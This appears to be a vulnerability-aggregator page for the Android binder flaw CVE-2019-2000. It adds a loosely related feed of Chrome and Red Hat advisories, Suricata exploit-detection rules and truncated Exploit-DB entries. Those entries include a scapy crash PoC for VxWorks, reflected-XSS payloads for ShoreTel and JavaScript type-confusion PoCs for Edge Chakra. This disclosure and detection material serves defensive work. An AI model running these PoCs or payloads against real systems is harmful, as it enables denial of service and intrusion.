CVE-2019-2000
published 2019-02-28CVE-2019-2000: In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no…
PriorityP344high7.8CVSS 3.0
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
0.66%
47.1th percentile
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | android | — | — |
| android | — | — | |
| chrome_chrome | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xqxh-7jrj-2mvm: In several functions of binder
ghsa_unreviewed·2022-05-13
CVE-2019-2000 [HIGH] CWE-787 GHSA-xqxh-7jrj-2mvm: In several functions of binder
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
OSV
CVE-2019-2000: In several functions of binder
osv·2019-02-28·CVSS 7.8
CVE-2019-2000 [HIGH] CVE-2019-2000: In several functions of binder
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
Chrome
Stable Channel Update for Desktop: CVE-2021-21135
vendor_chrome·2021-01-19·CVSS 6.5
CVE-2021-21135 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-21135
Stable Channel Update for Desktop
CVE-2021-21135: Inappropriate implementation in Performance API. Reported by ndevtk on 2020-12-11 [$2000][ 1038002 ] Low CVE-2021-21136: Insufficient policy enforcement in WebView
Reported by Shiv Sahni, Movnavinothan V and Imdad Mohammed on 2019-12-27 [$500][ 1093791 ] Low CVE-2021-21137: Inappropriate implementation in DevTools
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6430
vendor_chrome·2020-04-07·CVSS 8.8
CVE-2020-6430 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6430
Stable Channel Update for Desktop
CVE-2020-6430: Type Confusion in V8. Reported by Avihay Cohen @ SeraphicAlgorithms on 2019-12-06
[$2000][ 1040755 ] Medium CVE-2020-6456: Insufficient validation of untrusted input in clipboard
Reported by Michał Bentkowski of Securitum on 2020-01-10
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6396
vendor_chrome·2020-02-04·CVSS 4.3
CVE-2020-6396 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6396
Stable Channel Update for Desktop
CVE-2020-6396: Inappropriate implementation in Skia. Reported by William Luc Ritchie on 2019-12-18
[$2000][ 1027408 ] Medium CVE-2020-6397: Incorrect security UI in sharing
Reported by Khalil Zhani on 2019-11-22
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6398
vendor_chrome·2020-02-04·CVSS 8.8
CVE-2020-6398 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6398
Stable Channel Update for Desktop
CVE-2020-6398: Uninitialized use in PDFium. Reported by pdknsk on 2019-12-09
[$2000][ 1039869 ] Medium CVE-2020-6399: Insufficient policy enforcement in AppCache
Reported by Luan Herrera (@lbherrera_) on 2020-01-07
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6381
vendor_chrome·2020-02-04·CVSS 8.8
CVE-2020-6381 [HIGH] Stable Channel Update for Desktop: CVE-2020-6381
Stable Channel Update for Desktop
CVE-2020-6381: Integer overflow in JavaScript. Reported by The UK's National Cyber Security Centre (NCSC) on 2019-12-09
[$2000][ 1031909 ] High CVE-2020-6382: Type Confusion in JavaScript
Reported by Soyeon Park and Wen Xu from SSLab, Gatech on 2019-12-08
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2020-6378
vendor_chrome·2020-01-16·CVSS 8.8
CVE-2020-6378 [CRITICAL] Stable Channel Update for Desktop: CVE-2020-6378
Stable Channel Update for Desktop
CVE-2020-6378: Use-after-free in speech recognizer. Reported by Antti Levomäki and Christian Jalio from Forcepoint on 2019-10-28
[$2000][ 1033407 ] High CVE-2020-6379: Use-after-free in speech recognizer
Reported by Guang Gong of Alpha Team, Qihoo 360 on 2019-12-12
Severity: critical
Chrome
Stable Channel Update for Desktop: CVE-2019-13741
vendor_chrome·2019-12-10·CVSS 8.8
CVE-2019-13741 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-13741
Stable Channel Update for Desktop
CVE-2019-13741: Insufficient validation of untrusted input in Blink. Reported by Michał Bentkowski of Securitum on 2019-10-07
[$2000][ 1017564 ] Medium CVE-2019-13742: Incorrect security UI in Omnibox
Reported by Khalil Zhani on 2019-10-24
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-13739
vendor_chrome·2019-12-10·CVSS 6.5
CVE-2019-13739 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-13739
Stable Channel Update for Desktop
CVE-2019-13739: Incorrect security UI in Omnibox. Reported by xisigr of Tencent's Xuanwu Lab on 2018-03-22
[$2000][ 1005596 ] Medium CVE-2019-13740: Incorrect security UI in sharing
Reported by Khalil Zhani on 2019-09-19
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-13705
vendor_chrome·2019-10-22·CVSS 4.3
CVE-2019-13705 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-13705
Stable Channel Update for Desktop
CVE-2019-13705: Extension permission bypass. Reported by Luan Herrera (@lbherrera_) on 2019-07-30
[$2000][ 1001159 ] Medium CVE-2019-13706: Out-of-bounds read in PDFium
Reported by pdknsk on 2019-09-05
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-13713
vendor_chrome·2019-10-22·CVSS 6.5
CVE-2019-13713 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-13713
Stable Channel Update for Desktop
CVE-2019-13713: Cross-origin data leak. Reported by David Erceg on 2019-08-13
[$2000][ 982812 ] Low CVE-2019-13714: CSS injection
Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2019-07-10
Severity: medium
Red Hat
exiv2: infinite loop and hang in Jp2Image::readMetadata() in jp2image.cpp could lead to DoS
vendor_redhat·2019-09-30·CVSS 7.5
CVE-2019-20421 [HIGH] CWE-835 exiv2: infinite loop and hang in Jp2Image::readMetadata() in jp2image.cpp could lead to DoS
exiv2: infinite loop and hang in Jp2Image::readMetadata() in jp2image.cpp could lead to DoS
In Jp2Image::readMetadata() in jp2image.cpp in Exiv2 0.27.2, an input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
A denial of service vulnerability was found in exiv2 in the way JPEG 2000 (JP2) metadata was read when processing an image file. A remote attacker could abuse this flaw to create a specially crafted image, causing exiv2 to enter into an infinite loop when processing an incoming malicious image.
Statement: This flaw did not affect the versions of exiv2 as shipped with Red Hat Enterprise Linux 6, 7, and 8 as they did not include the vulnerable code, which was
Chrome
Stable Channel Update for Desktop: CVE-2019-5879
vendor_chrome·2019-09-10·CVSS 6.5
CVE-2019-5879 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-5879
Stable Channel Update for Desktop
CVE-2019-5879: Extensions can read some local files. Reported by Jinseo Kim on 2019-07-20
[$2000][ 831725 ] Medium CVE-2019-5880: SameSite cookie bypass
Reported by Jun Kokatsu (@shhnjk) on 2018-04-11
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-5880
vendor_chrome·2019-09-10·CVSS 7.4
CVE-2019-5880 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-5880
Stable Channel Update for Desktop
CVE-2019-5880: Insufficient policy enforcement in cookies. Reported by Isaac Dawson on 2018-01-18 [$2000][ 7 09946 ] Medium CVE-2019-5880: Insufficient policy enforcement in cookies
Reported by Gertjan Franken on 2017-04-10
Severity: medium
Android
CVE-2019-2000: Binder driver
vendor_android·2019-02-01·CVSS 7.8
CVE-2019-2000 [HIGH] CVE-2019-2000: Binder driver
Android Security Bulletin 2019-02-01
CVE: CVE-2019-2000
Severity: HIGH
Type: EoP
Component: Binder driver
References: A-120025789*
Suricata
GPL RPC STATD UDP monitor mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD UDP monitor mon_name format string exploit attempt
GPL RPC STATD UDP monitor mon_name format string exploit attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP monitor mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 02|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101915; rev:10; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL RPC portmap ypserv request UDP
suricata·2010-09-23
CVE-2000-1042 GPL RPC portmap ypserv request UDP
GPL RPC portmap ypserv request UDP
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap ypserv request UDP"; content:"|00 01 86 A0|"; depth:4; offset:12; content:"|00 00 00 03|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; content:"|00 01 86 A4|"; within:4; content:"|00 00 00 00|"; depth:4; offset:4; reference:arachnids,12; reference:bugtraq,5914; reference:bugtraq,6016; reference:cve,2000-1042; reference:cve,2000-1043; reference:cve,2002-1232; classtype:rpc-portmap-decode; sid:2100590; rev:13; metadata:created_at 2010_09_23, cve CVE_2000_1042, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL IMAP find overflow attempt
suricata·2010-09-23
CVE-2000-0284 GPL IMAP find overflow attempt
GPL IMAP find overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP find overflow attempt"; flow:established,to_server; content:"FIND"; nocase; isdataat:100,relative; pcre:"/\sFIND\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101904; rev:8; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL RPC STATD UDP stat mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD UDP stat mon_name format string exploit attempt
GPL RPC STATD UDP stat mon_name format string exploit attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP stat mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 01|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101913; rev:11; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL IMAP rename overflow attempt
suricata·2010-09-23
CVE-2000-0284 GPL IMAP rename overflow attempt
GPL IMAP rename overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP rename overflow attempt"; flow:established,to_server; content:"RENAME"; nocase; isdataat:100,relative; pcre:"/\sRENAME\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101903; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators
exploitdb·2019-08-15
CVE-2019-8016 Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators
Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such
Exploit-DB
Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts
exploitdb·2019-08-15
CVE-2019-8017 Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts
Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such a
Exploit-DB
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb·2019-08-12·CVSS 9.8
CVE-2019-12255 [CRITICAL] VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
---
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn
Exploit-DB
Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD
exploitdb·2019-07-10
CVE-2019-1121 Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD
Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AF
Exploit-DB
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset
exploitdb·2019-07-10
CVE-2019-1128 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was origina
Exploit-DB
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes
exploitdb·2019-07-10
CVE-2019-1127 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was originally
Exploit-DB
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
exploitdb·2019-07-10
CVE-2019-1118 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was o
Exploit-DB
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator
exploitdb·2019-07-10
CVE-2019-1123 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that A
Exploit-DB
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
exploitdb·2019-07-10
CVE-2019-1119 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AF
Exploit-DB
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth
exploitdb·2019-07-10
CVE-2019-1117 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth
---
----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO w
Exploit-DB
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings
exploitdb·2019-07-10
CVE-2019-1122 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was origina
Exploit-DB
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect
exploitdb·2019-07-10
CVE-2019-1120 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect
Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was origin
Exploit-DB
Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings
exploitdb·2019-07-10
CVE-2019-1124 Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings
Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude tha
Exploit-DB
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
exploitdb·2019-04-08·CVSS 6.1
CVE-2019-9593 [MEDIUM] ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
ShoreTel Connect ONSITE alert(1)y0gpy&page=ACCOUNT
Affected Parameter: brandUrl
Vulnerability 2: Reflected XSS
Affected URL:
/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b
Affected Parameter: url
Affected Version 19.45.1602.0
Vulnerability 3: Reflected XSS
/site/?page=jtqv8">alert(1)bi14e
Affected Parameter: page
Affected Version:18.82.2000.0
GET /site/?page=jtqv8">alert(1)bi14e HTTP/1.1
Host: hostnamem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bdrsconference.bdrs.com/signin.php
Cookie: PHPSESS
Exploit-DB
Android - binder Use-After-Free via fdget() Optimization
exploitdb·2019-02-12
CVE-2019-2000 Android - binder Use-After-Free via fdget() Optimization
Android - binder Use-After-Free via fdget() Optimization
---
This bug report describes *two* different issues in different branches of the
binder kernel code.
The first issue is in the upstream Linux kernel,
commit 7f3dc0088b98 ("binder: fix proc->files use-after-free");
the second issue is in the wahoo kernel (and maybe elsewhere? but at least the
android common kernel for 4.4 doesn't seem to contain this code...),
commit 1b652c7c29b7 ("FROMLIST: binder: fix proc->files use-after-free")
(WARNING: NOT the same as "UPSTREAM: binder: fix proc->files use-after-free" in
the android common kernel!).
Some background: In the Linux kernel, normally, when a `struct file *` is read
from the file descriptor table, the reference counter of the `struct file` is
bumped to account for the extra refere
Exploit-DB
Microsoft Edge Chakra - 'InitClass' Type Confusion
exploitdb·2019-01-18
CVE-2019-0539 Microsoft Edge Chakra - 'InitClass' Type Confusion
Microsoft Edge Chakra - 'InitClass' Type Confusion
---
/*
Issue description
This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.
PoC:
*/
function opt(o, c, value) {
o.b = 1;
class A extends c {
}
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, (function () {}), {});
}
let o = {a: 1, b: 2};
let cons = function () {};
cons.prototype = o;
opt(o, cons, 0x1234);
print(o.a);
}
main();
Exploit-DB
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
exploitdb·2019-01-18
CVE-2019-0567 Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
---
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__:
Talos
Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
blogs_talos·2020-02-11·CVSS 8.8
[HIGH] Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.
Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000.
Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.
In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.
### Vulnerability detailsMicrosoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0759)
An exploitable use-after-free vulnerability exists in Excel in Microsoft
Talos
Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
blogs_talos·2020-02-11·CVSS 8.8
[HIGH] Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
## Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.
Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000.
Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here .
In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.
## Vulnerability details Microsoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0
2019-02-28
Published